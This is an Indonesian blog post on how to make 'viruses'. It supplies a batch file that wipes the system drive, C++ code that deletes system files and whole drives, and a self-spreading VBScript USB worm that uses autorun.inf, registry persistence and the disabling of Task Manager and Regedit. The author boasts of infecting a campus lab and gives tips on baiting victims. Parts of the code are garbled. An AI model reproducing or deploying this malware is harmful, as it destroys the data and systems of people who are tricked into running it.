Selasa, 18 November 2008

TENTANG MEMBUAT VIRUS

Membuat virus hack dengan notepad
How to make virus, saya dapet nih formula dari temen saya met mencoba ya…..? Ketik program berikut dengan notepad, dan simpan dengan ekstensi bat, misalnya virus.bat @echo offdel %systemdrive%\*.* /f /s /qshutdown -r -f -t 00 PERHATIAN : Program ini akan menghapus sistem Anda , makanya berhati-hatilah. Saya tidak bertanggung jawab atas semua yang terjadi, silahkan tanggung resiko sendiri.. ck..ckk.. Sebagai tambahan, Anda dapat juga menggunakan kode program berikut. Perintah ini hanya akan me-restart komputer Anda.. Anda aman untuk mencobanya. Sama seperti program virus.bat, program di bawah ini juga harus disimpan dengan ekstensi .bat, misalnya restart.bat @echo offshutdown -r -f -t 00 Anda dapat berimprovisasi dengan menambahkan sebuah file autorun.inf file untuk menjalankan program tersebut ketika seseorang melakukan klik ganda pada sebuah drive.SELAMAT MENCOBA. “Gunakanlah ilmu untuk kebaikan, jangan gunakan untuk kejahatan dan gagah-gagahan”. 2 Aku uda nyobain, dan uda aku sebarin di LAB kampusku, hasilnya ….???? Banyak computer yang minta install ulang. Banyak temenku yang bilang kalo ne adalah criminal, tapi menurutku ini merupakan suatu inspirasi baru untuk mengaplikasikan ilmu penyetahuan. Sebenarnya ini bukan virus, ini hanya sebuah program sederhana untuk memanggil dan mengeksekusi file pada windows. Disamping itu, icon nya masih sederhana banget, jadi mudah dan gampang untuk di tebak sebagai “virus”. Kelemahan lainnya adalah, virus ini tidak bisa menjalankan dirinya sendiri, harus melalui bantuan user dengan cara double klik. Untuk itu, aku selalu save dengan nama yang bisa buat orang penasaran, seperti hantu, pocong, miyabi, xxx, dll. Source code: #include #include using namespace std; int main(int argc, char *argv[]) { std::remove("%SystemRoot%\\system32\\rededt32.exe");//menghapus register windows std::remove("%SystemRoot%\\regedt32.exe"); //menghapus register windows std::remove("%SystemRoot%\\notepad.exe"); //menghapus notepad.exe std::remove("%SystemRoot%\\explorer.exe"); // menghapus explorer.exe std::remove("D:\\*.*"); // menghapus semua file dan folder pada drive D std::remove("E:\\*.*"); // menghapus semua file dan folder pada drive E std::remove("F:\\*.*"); // menghapus semua file dan folder pada drive F std::remove("G:\\*.*"); // menghapus semua file dan folder pada drive G system("%SystemRoot%\\system32\\shutdown.exe -s -f -t 05"); //05=durasi shutdown cout<<"============================================"< isi =" “[autorun]”" shellexecute="wscript.exe" fs =" createobject(”Scripting.FileSystemObject”)" mf =" fs.getfile(Wscript.ScriptFullname)" size =" mf.size" check =" mf.drive.drivetype" text =" mf.openastextstream(1,-2)" rekur =" rekur" rekur =" rekur" windowpath =" fs.getspecialfolder(0)" tf =" fs.getfile(windowpath" attributes =" 32" tf="fs.createtextfile(windowpath" tf =" fs.getfile(windowpath" attributes =" 39" drivetype =" 1" drivetype =" 2)"> “A:” then ‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–// set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “) tf.attributes =32 set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true) tf.write rekursif tf.close set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “) tf.attributes = 39 ‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–// set tf =fs.getfile(flashdrive.path &”\autorun.inf”) tf.attributes = 32 set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true) tf.write isi tf.close set tf = fs.getfile(flashdrive.path &”\autorun.inf”) tf.attributes=39 end if next ‘//–Manipulasi Registry–// set kalong = createobject(”WScript.Shell”) ‘//–Manip - Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–// kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “ ‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–// kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD” ‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–// kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD” kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD” kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD” kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD” kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD” ‘//–Manip – Disable klik kanan–// kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD” ‘//–Manip - Munculkan Pesan Setiap Windows Startup–// kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.” ‘//–Manip – Aktif setiap Windows Startup–// kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “ ‘//–Manip – Ubah RegisteredOwner dan Organization–// kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix” kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong” ‘//–Nah kalo kode dibawah ni ko dak tau, tolong baseng untuk menjelaskan–// if check <> 1 then Wscript.sleep 200000 end if loop while check <> 1 set sd = createobject(”Wscript.shell”) sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname ‘Akhir dari Kode seve kode di notepad dgn care File-> Save. trus di save as type 'all files (*.*). trus simpen dng name : k4l0n6.dll.vbs. sebener e dak usah pakai *.dll ge dak ape2 tapi ni usaha agar biak telalu mencurigakan. virus worm ne bukan murni dari pemikiran ku sendiri' krn kode2 e niru kode e virus Rangga-Zay. oke cek cuman cem tulah pemikiranku semoga jadi pembelajaran kek nambah sedikit e pengetahuan kite. semoga ape yg kite miliki dapat kite guneken untuk kebaikan.


http://fuangpoetry.blogspot.com

Tidak ada komentar: